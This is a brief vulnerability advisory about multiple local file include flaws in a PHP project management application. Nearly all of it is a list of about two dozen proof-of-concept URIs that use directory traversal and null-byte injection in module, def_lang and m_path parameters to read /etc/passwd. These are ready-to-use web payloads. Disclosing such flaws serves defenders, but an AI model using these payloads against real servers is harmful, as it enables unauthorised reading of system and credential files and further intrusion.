|
PHP Project Management Multiple Local File Include Vulnerabilities
Attackers can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/modules/certinfo/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/emails/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/events/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/fax/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/files/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00 http://www.example.com/modules/groupadm/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/history/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/info/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/log/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/mail/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/messages/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/organizations/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/phones/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/presence/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/projects/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00 http://www.example.com/modules/projects/list.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/reports/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/search/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/snf/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/syslog/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/tasks/index.php?module=../../../../../../etc/passwd%00 http://www.example.com/modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00 http://www.example.com/modules/useradm/index.php?module=../../../../../../etc/passwd%00 |
|
Privacy Statement |